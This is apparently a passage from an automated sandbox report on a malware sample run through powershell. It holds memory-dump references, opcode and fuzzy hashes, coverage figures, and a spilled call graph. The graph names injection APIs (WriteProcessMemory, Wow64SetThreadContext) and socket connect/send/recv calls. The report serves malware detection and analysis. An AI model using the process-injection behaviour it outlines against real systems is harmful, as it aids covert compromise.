• Instruction Fuzzy Hash: 60512971D01229DFEB24CF99C840BDDBBB1BF48304F1084AAE909B7250EB71AA85DF50

Control-flow Graph (graph not reproduced)
APIs
• WriteProcessMemory.KERNELBASE(?,00000000,00000000,18A22514,00000000,?,?,?,00000000,00000000,?,04789AE7,?,00000000,?), ref: 0478A35C
Memory Dump Source
• Source File: 0000000A.00000002.1870251603.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_4780000_powershell.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0

Control-flow Graph (graph not reproduced)
APIs
• WriteProcessMemory.KERNELBASE(?,00000000,00000000,18A22514,00000000,?,?,?,00000000,00000000,?,04789AE7,?,00000000,?), ref: 0478A35C
Memory Dump Source
• Source File: 0000000A.00000002.1870251603.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_4780000_powershell.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0

Control-flow Graph (graph not reproduced)
APIs
• Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,0478989B), ref: 0478A1D3
Memory Dump Source
• Source File: 0000000A.00000002.1870251603.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_4780000_powershell.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0

Control-flow Graph (graph not reproduced)
APIs
• Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,0478989B), ref: 0478A1D3
Memory Dump Source
• Source File: 0000000A.00000002.1870251603.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_4780000_powershell.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0

Control-flow Graph (graph not reproduced)
APIs
• Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,0478989B), ref: 0478A1D3
Memory Dump Source
• Source File: 0000000A.00000002.1870251603.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_4780000_powershell.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0

Control-flow Graph (graph not reproduced)
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1920493774.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_7450000_powershell.jbxd
Similarity
• API ID:
• String ID: 84i
• API String ID: 0-676453231
Memory Dump Source
• Source File: 0000000A.00000002.1920493774.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_7450000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 4a5364f0172af67eeef09587e966caf22f4d249f5452fab5545372f395ba4903
                                                                                                                                                                                                                                  • Instruction ID: 6f0515355ac442694f4a858b7197b0728af3ae5a2e04139d3da9fd6913b822f5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4a5364f0172af67eeef09587e966caf22f4d249f5452fab5545372f395ba4903
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EE1215F170031A9FDB289F68D4407EBBBA2FF85210F14846BD8168B352DBB1C945C7A1
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1920493774.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_7450000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 2695c5ccd90b8256f54e9d84c73d33b1fa2558439910da4d21961aa0dd947b4c
                                                                                                                                                                                                                                  • Instruction ID: 738a7b70321263733d74140ea3022971e5fe1b9a9d068ce7e9210537919d8dca
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2695c5ccd90b8256f54e9d84c73d33b1fa2558439910da4d21961aa0dd947b4c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D6B138B1704349DFDB259B69C4007EBBBA2AF82611F2484ABDD46CB353DB31C941C7A1
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1920493774.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_7450000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: cf914556c442b59b0cf5c1dfd7f7bea838a75ef034fbc5b6f79676f85524eca0
                                                                                                                                                                                                                                  • Instruction ID: 644bbd495d0aad36a09784bfd678de705f0433816f7437990db5b9a4ce09909c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cf914556c442b59b0cf5c1dfd7f7bea838a75ef034fbc5b6f79676f85524eca0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A4A1E5B9B042058FDB25DA79D4106EBBBE1AFC1311F2484ABD855CB362EB31C941C791
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1920493774.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_7450000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 18c5f87cac8d1bef9a31c9af3462d2832397d76f819eaa9ebc7a899fbbc34164
                                                                                                                                                                                                                                  • Instruction ID: 6afa86757f8397d0a85111fa5ec09e2b7b4dc6772a6a4cadca455e6e57228daf
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 18c5f87cac8d1bef9a31c9af3462d2832397d76f819eaa9ebc7a899fbbc34164
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 78517FB4A00204CBDB04DB58C554BDE77F2FF89714F64806AE8056F355DBB2DD818BA1
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1920493774.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_7450000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: fce3728b145d74f598cd357ff1662c682356f774e8ce44f603705ed5441a99f6
                                                                                                                                                                                                                                  • Instruction ID: 81689bfc40a7bf4b5a55a906d710904b0a55a12af52c7fc4427f9acf6bb0b388
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fce3728b145d74f598cd357ff1662c682356f774e8ce44f603705ed5441a99f6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ED514BB4A002049FDB04CB54C554BDEBBF2FF89714F6580AAE9056F356C6B2ED81CB61
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1920493774.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_7450000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 76ed1aab53a5c37f0a2676d92f28b29dd7b72aef89aeaf368e09654c1165daf9
                                                                                                                                                                                                                                  • Instruction ID: a1ff40f0337c2c8eb726d27a20dcc8b3b2ae140402f3ca1772ddab6df7eba982
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 76ed1aab53a5c37f0a2676d92f28b29dd7b72aef89aeaf368e09654c1165daf9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FE31F3F861430A9FDB21DA3485107EBB7A49B82360F1585A7DC049B3A3E735CA81C7A1
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1920493774.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_7450000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: c6d5bbf46a183b6f551f0409a297d932536e95b9c951bc43aa3f39a2dca3f582
                                                                                                                                                                                                                                  • Instruction ID: 6ddab819f451dad702a7391be0a4cf29976f370841513e8470d67e81357d3165
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c6d5bbf46a183b6f551f0409a297d932536e95b9c951bc43aa3f39a2dca3f582
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F83103B560434EDFCB298E15C5407E6BBB1EF42221F2981A7DC158B253D335D98ACBA1
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1920493774.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_7450000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 5463e9cf53678adcc6dc178dda217cae8ce7c121bc0ed7d958be7680ad17f426
                                                                                                                                                                                                                                  • Instruction ID: f508678d5911c9d41628fe52424635de0028ce51fb4eb1c4228381a1298a00c8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5463e9cf53678adcc6dc178dda217cae8ce7c121bc0ed7d958be7680ad17f426
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A3119DB8B0020A9FCB64DE79C4407FABBE5AF84310F148567D81887362E774C981CF91
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1869871875.00000000046DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 046DD000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_46dd000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 1d608b6b363f53694f784900229aec2cce1e419b9cb6cce6021ae1348059af91
                                                                                                                                                                                                                                  • Instruction ID: 2018eb7f962ce6c90252b5edd86b6322259823f121a5e737782e83e63230ca3d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1d608b6b363f53694f784900229aec2cce1e419b9cb6cce6021ae1348059af91
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4201807140D3C4AFD7129F259D84752BFA4DF93224F0985DBE8888F293D2695C45CB72
                                                                                                                                                                                                                                  Memory Dump Source
• Source File: 0000000A.00000002.1869871875.00000000046DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 046DD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_46dd000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 39a77b0cd2e9304234edaa0652a9122df1a761427d0740d62285e006b994f152
• Instruction ID: 8e4e19f5a7a1e3c45ef3f7c161788159d2812955702173aabd8662aa25fff54a
• Opcode Fuzzy Hash: 39a77b0cd2e9304234edaa0652a9122df1a761427d0740d62285e006b994f152
• Instruction Fuzzy Hash: 1D01F771904344ABE7106F65EC84B67BB98EFD1760F08C419DD080A242E279A846CAB2

Execution Graph

Execution Coverage: 5.6%
Dynamic/Decrypted Code Coverage: 46.9%
Signature Coverage: 5.4%
Total number of Nodes: 1983
Total number of Limit Nodes: 82
execution_graph: rendered call-graph omitted (node and edge list spilled into the text by extraction). The graph nodes reference API calls including CreateDirectoryW, CopyFileW, CreateFileW, GetFileSize, ReadFile, WriteFile, CloseHandle, PathFileExistsW, FindFirstFileW, FindNextFileW, FindClose, SetFileAttributesW, DeleteFileW, RemoveDirectoryW, CreateProcessW, TerminateProcess, WaitForSingleObject, Sleep, LoadLibraryW, GetModuleHandleA, GetProcAddress, VirtualProtect, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, FindWindowExA, GetWindowThreadProcessId, ShowWindow, CryptAcquireContextA, CryptGenRandom, CryptReleaseContext, select, send, recv, closesocket, setsockopt, ioctlsocket, WSAGetLastError, GetEnvironmentStringsW, FreeEnvironmentStringsW, WideCharToMultiByte, RtlAllocateHeap, RtlFreeHeap, GetLastError, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, RaiseException, and CRT helpers (_abort, _free, __dosmaperr, ___scrt_fastfail, ___BuildCatchObject, std::_Xinvalid_argument, dllmain_crt_process_attach/detach, dllmain_crt_dispatch, dllmain_raw).
69047->69034 69048->69033 69049->69044 69050 426091 69055 42610e send 69050->69055 69056 425e56 69057 425e6b 69056->69057 69067 425f0b 69056->69067 69058 425eee 69057->69058 69059 425f5a 69057->69059 69060 425eb9 69057->69060 69066 425f25 69057->69066 69057->69067 69070 425f77 69057->69070 69071 425f9e 69057->69071 69084 424354 48 API calls _Yarn 69057->69084 69058->69066 69058->69067 69086 424354 48 API calls _Yarn 69058->69086 69059->69070 69088 424b7b 21 API calls 69059->69088 69060->69058 69060->69067 69085 41f075 52 API calls 69060->69085 69066->69059 69066->69067 69087 41f075 52 API calls 69066->69087 69070->69067 69070->69071 69072 424f78 69070->69072 69071->69067 69089 4255c7 28 API calls 69071->69089 69074 424f97 ___scrt_fastfail 69072->69074 69073 424fab 69079 424fcb 69073->69079 69080 424fb4 69073->69080 69092 41cf6e 48 API calls 69073->69092 69076 424fa6 69074->69076 69074->69079 69090 41e097 21 API calls 69074->69090 69076->69073 69076->69079 69091 41fad4 45 API calls 69076->69091 69079->69071 69080->69079 69093 424185 21 API calls 2 library calls 69080->69093 69082 42504e 69082->69079 69083 431f99 21 API calls 69082->69083 69083->69073 69084->69060 69085->69060 69086->69066 69087->69066 69088->69070 69089->69067 69090->69076 69091->69082 69092->69080 69093->69079 69094 416017 69095 416020 69094->69095 69111 416057 69094->69111 69130 401d64 69095->69130 69097 41602b 69099 401d64 28 API calls 69097->69099 69101 416038 69099->69101 69135 4027ec 69101->69135 69103 416043 69139 4027cb 69103->69139 69104 401d64 28 API calls 69106 416087 69104->69106 69108 401d64 28 API calls 69106->69108 69107 41604f 69142 405d07 69107->69142 69110 416094 69108->69110 69112 4027ec 28 API calls 69110->69112 69157 401f86 69111->69157 69113 41609f 69112->69113 69114 4027cb 28 API calls 69113->69114 69115 4160ab 69114->69115 69161 405d67 119 API calls 69115->69161 69117 4160b7 69162 401eea 69117->69162 69119 4160c0 69120 401eea 11 API calls 69119->69120 69121 4161e9 
69120->69121 69122 4161f2 69121->69122 69123 401eea 11 API calls 69121->69123 69166 401d8c 69122->69166 69123->69122 69125 4161fb 69126 401eea 11 API calls 69125->69126 69127 416207 69126->69127 69128 401eea 11 API calls 69127->69128 69129 416213 69128->69129 69131 401d6c 69130->69131 69132 401d74 69131->69132 69172 401fff 28 API calls 69131->69172 69132->69097 69134 401d8b 69136 4027f8 69135->69136 69173 402e78 69136->69173 69138 402814 69138->69103 69182 401e9b 69139->69182 69141 4027d9 69141->69107 69191 401ebd 69142->69191 69158 401f8e 69157->69158 69159 402325 28 API calls 69158->69159 69160 401fa4 69159->69160 69160->69104 69161->69117 69164 4021b9 69162->69164 69163 4021e8 69163->69119 69164->69163 69165 40262e 11 API calls 69164->69165 69165->69163 69167 40200a 69166->69167 69168 402654 11 API calls 69167->69168 69171 40203a 69167->69171 69169 40202b 69168->69169 70085 4026ba 11 API calls _Deallocate 69169->70085 69171->69125 69172->69134 69174 402e85 69173->69174 69175 402ea9 69174->69175 69176 402e98 69174->69176 69178 402eae 69174->69178 69175->69138 69180 403445 28 API calls 69176->69180 69178->69175 69181 40225b 11 API calls 69178->69181 69180->69175 69181->69175 69183 401ea7 69182->69183 69186 40245c 69183->69186 69185 401eb9 69185->69141 69187 402469 69186->69187 69189 402478 69187->69189 69190 402ad3 28 API calls 69187->69190 69189->69185 69190->69189 69193 401ec9 69191->69193 69192 401ee4 69195 4040bb 69192->69195 69193->69192 69294 402325 69193->69294 69196 4040cb 69195->69196 69197 4040fa 69196->69197 69299 4041f1 69196->69299 69199 40428c connect 69197->69199 69200 4043e1 69199->69200 69201 4042b3 69199->69201 69202 404343 69200->69202 69203 4043e7 WSAGetLastError 69200->69203 69201->69202 69204 4042e8 69201->69204 69307 404cbf 69201->69307 69259 401fbd 69202->69259 69203->69202 69205 4043f7 69203->69205 69339 420151 27 API calls 69204->69339 69208 4042f7 69205->69208 69209 4043fc 69205->69209 69214 401f66 28 API calls 69208->69214 69344 41bc76 
69209->69344 69210 4042f0 69210->69208 69213 404306 69210->69213 69211 4042d4 69311 401f66 69211->69311 69224 404315 69213->69224 69225 40434c 69213->69225 69217 404448 69214->69217 69220 401f66 28 API calls 69217->69220 69226 404457 69220->69226 69222 404418 69223 401f66 28 API calls 69222->69223 69227 404427 69223->69227 69229 401f66 28 API calls 69224->69229 69341 420f34 54 API calls 69225->69341 69230 41a686 79 API calls 69226->69230 69231 41a686 79 API calls 69227->69231 69233 404324 69229->69233 69230->69202 69234 40442c 69231->69234 69232 404354 69235 404389 69232->69235 69236 404359 69232->69236 69237 401f66 28 API calls 69233->69237 69238 401eea 11 API calls 69234->69238 69343 4202ea 28 API calls 69235->69343 69239 401f66 28 API calls 69236->69239 69240 404333 69237->69240 69238->69202 69242 404368 69239->69242 69243 41a686 79 API calls 69240->69243 69245 401f66 28 API calls 69242->69245 69246 404338 69243->69246 69244 404391 69247 4043be CreateEventW CreateEventW 69244->69247 69248 401f66 28 API calls 69244->69248 69249 404377 69245->69249 69340 41dc15 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 69246->69340 69247->69202 69250 4043a7 69248->69250 69251 41a686 79 API calls 69249->69251 69253 401f66 28 API calls 69250->69253 69254 40437c 69251->69254 69255 4043b6 69253->69255 69342 420592 52 API calls 69254->69342 69257 41a686 79 API calls 69255->69257 69258 4043bb 69257->69258 69258->69247 69260 401fcc 69259->69260 69369 402501 69260->69369 69262 401fea 69263 404468 69262->69263 69264 40447b 69263->69264 69374 404be8 69264->69374 69266 404490 _Yarn 69267 404507 WaitForSingleObject 69266->69267 69268 4044e7 69266->69268 69269 40451d 69267->69269 69270 4044f9 send 69268->69270 69378 42051a 54 API calls 69269->69378 69271 404542 69270->69271 69274 401eea 11 API calls 69271->69274 69273 404530 SetEvent 69273->69271 69275 40454a 69274->69275 69276 401eea 11 API calls 69275->69276 69277 404552 69276->69277 69278 4045d5 69277->69278 69285 
4045ec 69278->69285 69279 43a88c ___std_exception_copy 21 API calls 69279->69285 69281 401f86 28 API calls 69281->69285 69282 404666 69408 4047eb WaitForSingleObject 69282->69408 69285->69279 69285->69281 69285->69282 69287 401eea 11 API calls 69285->69287 69384 40455b 69285->69384 69390 401eef 69285->69390 69394 404688 69285->69394 69287->69285 69288 401eea 11 API calls 69289 404676 69288->69289 69290 401eea 11 API calls 69289->69290 69291 40467f 69290->69291 69293 4048a6 98 API calls 69291->69293 69295 40232f 69294->69295 69297 40233a 69295->69297 69298 40294a 28 API calls 69295->69298 69297->69192 69298->69297 69300 404206 socket 69299->69300 69301 4041fd 69299->69301 69303 404220 69300->69303 69304 404224 CreateEventW 69300->69304 69306 404262 WSAStartup 69301->69306 69303->69197 69304->69197 69305 404202 69305->69300 69305->69303 69306->69305 69308 404ccb 69307->69308 69309 402e78 28 API calls 69308->69309 69310 404cee 69309->69310 69310->69211 69312 401f6e 69311->69312 69355 402301 69312->69355 69315 41a686 69316 41a737 69315->69316 69317 41a69c GetLocalTime 69315->69317 69318 401eea 11 API calls 69316->69318 69319 404cbf 28 API calls 69317->69319 69321 41a73f 69318->69321 69320 41a6de 69319->69320 69359 405ce6 69320->69359 69323 401eea 11 API calls 69321->69323 69325 41a747 69323->69325 69324 41a6ea 69326 4027cb 28 API calls 69324->69326 69325->69204 69327 41a6f6 69326->69327 69328 405ce6 28 API calls 69327->69328 69329 41a702 69328->69329 69362 406478 76 API calls 69329->69362 69331 41a710 69332 401eea 11 API calls 69331->69332 69333 41a71c 69332->69333 69334 401eea 11 API calls 69333->69334 69335 41a725 69334->69335 69336 401eea 11 API calls 69335->69336 69337 41a72e 69336->69337 69338 401eea 11 API calls 69337->69338 69338->69316 69339->69210 69340->69202 69341->69232 69342->69246 69343->69244 69367 401faa 69344->69367 69346 41bc8a FormatMessageA 69347 41bcb6 69346->69347 69348 41bca8 69346->69348 69351 41bcc1 LocalFree 69347->69351 69349 401f66 28 API 
calls 69348->69349 69350 41bcb4 69349->69350 69352 401eea 11 API calls 69350->69352 69351->69350 69353 40440b 69352->69353 69354 404c9e 28 API calls 69353->69354 69354->69222 69356 40230d 69355->69356 69357 402325 28 API calls 69356->69357 69358 401f80 69357->69358 69358->69315 69363 404bc4 69359->69363 69361 405cf4 69361->69324 69362->69331 69364 404bd0 69363->69364 69365 40245c 28 API calls 69364->69365 69366 404be4 69365->69366 69366->69361 69368 401fb2 69367->69368 69368->69346 69370 40250d 69369->69370 69372 40252b 69370->69372 69373 40261a 28 API calls 69370->69373 69372->69262 69373->69372 69375 404bf0 69374->69375 69379 404c0c 69375->69379 69377 404c06 69377->69266 69378->69273 69380 404c16 69379->69380 69382 404c21 69380->69382 69383 404d07 28 API calls 69380->69383 69382->69377 69383->69382 69385 404592 recv 69384->69385 69386 404565 WaitForSingleObject 69384->69386 69388 4045a5 69385->69388 69421 420556 54 API calls 69386->69421 69388->69285 69389 404581 SetEvent 69389->69388 69391 401efe 69390->69391 69393 401f0a 69391->69393 69422 4021b9 69391->69422 69393->69285 69404 4046a3 69394->69404 69395 4047d8 69396 401eea 11 API calls 69395->69396 69397 4047e1 69396->69397 69397->69285 69398 403b60 28 API calls 69398->69404 69399 401eef 11 API calls 69399->69404 69400 401eea 11 API calls 69400->69404 69401 401ebd 28 API calls 69403 404772 CreateEventA CreateThread WaitForSingleObject CloseHandle 69401->69403 69402 401fbd 28 API calls 69402->69404 69403->69404 69938 414b9b 69403->69938 69404->69395 69404->69398 69404->69399 69404->69400 69404->69401 69404->69402 69434 411b60 69404->69434 69478 405de7 69404->69478 69520 402654 69404->69520 69409 404805 SetEvent CloseHandle 69408->69409 69410 40481c closesocket 69408->69410 69411 40466d 69409->69411 69412 404829 69410->69412 69411->69288 69413 40483f 69412->69413 70082 404ab1 83 API calls 69412->70082 69415 404851 WaitForSingleObject 69413->69415 69416 404892 SetEvent CloseHandle 69413->69416 70083 41dc15 
DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 69415->70083 69416->69411 69418 404860 SetEvent WaitForSingleObject 70084 41dc15 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 69418->70084 69420 404878 SetEvent CloseHandle CloseHandle 69420->69416 69421->69389 69423 4021c6 69422->69423 69424 4021e8 69423->69424 69426 40262e 69423->69426 69424->69393 69429 402bee 69426->69429 69428 40263b 69428->69424 69430 402bfb 69429->69430 69431 402c08 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 69429->69431 69433 4015d8 11 API calls _Deallocate 69430->69433 69431->69428 69433->69431 69435 411b72 69434->69435 69523 403b60 69435->69523 69438 401fbd 28 API calls 69439 411b94 69438->69439 69440 401fbd 28 API calls 69439->69440 69441 411ba3 69440->69441 69526 41afc3 69441->69526 69443 411c60 69445 401d8c 11 API calls 69443->69445 69447 411c69 69445->69447 69446 401d64 28 API calls 69448 411bc8 69446->69448 69449 401eea 11 API calls 69447->69449 69450 401fbd 28 API calls 69448->69450 69451 411c72 69449->69451 69452 411bd0 69450->69452 69453 401eea 11 API calls 69451->69453 69454 401d64 28 API calls 69452->69454 69455 411c7a 69453->69455 69456 411be0 69454->69456 69455->69404 69457 401fbd 28 API calls 69456->69457 69458 411be8 69457->69458 69459 401d64 28 API calls 69458->69459 69460 411bf8 69459->69460 69461 401fbd 28 API calls 69460->69461 69462 411c00 69461->69462 69463 401d64 28 API calls 69462->69463 69464 411c10 69463->69464 69465 401fbd 28 API calls 69464->69465 69466 411c18 69465->69466 69467 401d64 28 API calls 69466->69467 69468 411c28 69467->69468 69469 401fbd 28 API calls 69468->69469 69470 411c30 69469->69470 69471 401d64 28 API calls 69470->69471 69472 411c43 69471->69472 69473 401fbd 28 API calls 69472->69473 69474 411c4b 69473->69474 69547 411c81 GetModuleFileNameW 69474->69547 69477 4047eb 98 API calls 69477->69443 69479 405dfa 69478->69479 69480 403b60 28 API calls 69479->69480 69481 405e0d 69480->69481 69482 401fbd 28 API calls 
69481->69482 69483 405e1d 69482->69483 69484 401fbd 28 API calls 69483->69484 69485 405e2c 69484->69485 69486 41afc3 28 API calls 69485->69486 69487 405e35 69486->69487 69488 405f0f 69487->69488 69489 401d64 28 API calls 69487->69489 69490 401d8c 11 API calls 69488->69490 69491 405e4f 69489->69491 69492 405f18 69490->69492 69495 401d64 28 API calls 69491->69495 69493 401eea 11 API calls 69492->69493 69494 405f21 69493->69494 69496 401eea 11 API calls 69494->69496 69497 405e63 69495->69497 69498 405f29 69496->69498 69499 410b0d 40 API calls 69497->69499 69498->69404 69500 405e73 69499->69500 69500->69488 69501 410d8d 22 API calls 69500->69501 69502 405e89 69501->69502 69503 410d8d 22 API calls 69502->69503 69504 405e9a 69503->69504 69909 10001093 69504->69909 69505 405eaf 69506 401f86 28 API calls 69505->69506 69507 405ebe 69506->69507 69508 4027ec 28 API calls 69507->69508 69509 405edd 69508->69509 69510 4027cb 28 API calls 69509->69510 69511 405ee7 69510->69511 69512 404468 61 API calls 69511->69512 69513 405ef5 69512->69513 69514 401eea 11 API calls 69513->69514 69515 405efe 69514->69515 69516 4047eb 98 API calls 69515->69516 69517 405f06 69516->69517 69518 401eea 11 API calls 69517->69518 69518->69488 69925 402c1a 69520->69925 69689 403c30 69523->69689 69528 41afd6 69526->69528 69527 401eea 11 API calls 69529 41b078 69527->69529 69531 41b048 69528->69531 69532 403b60 28 API calls 69528->69532 69538 401eef 11 API calls 69528->69538 69542 401eea 11 API calls 69528->69542 69546 41b046 69528->69546 69705 41bfa9 28 API calls 69528->69705 69530 401eea 11 API calls 69529->69530 69533 41b080 69530->69533 69534 403b60 28 API calls 69531->69534 69532->69528 69535 401eea 11 API calls 69533->69535 69536 41b054 69534->69536 69539 411bac 69535->69539 69537 401eef 11 API calls 69536->69537 69540 41b05d 69537->69540 69538->69528 69539->69443 69539->69446 69541 401eea 11 API calls 69540->69541 69543 41b065 69541->69543 69542->69528 69706 41bfa9 28 API calls 69543->69706 
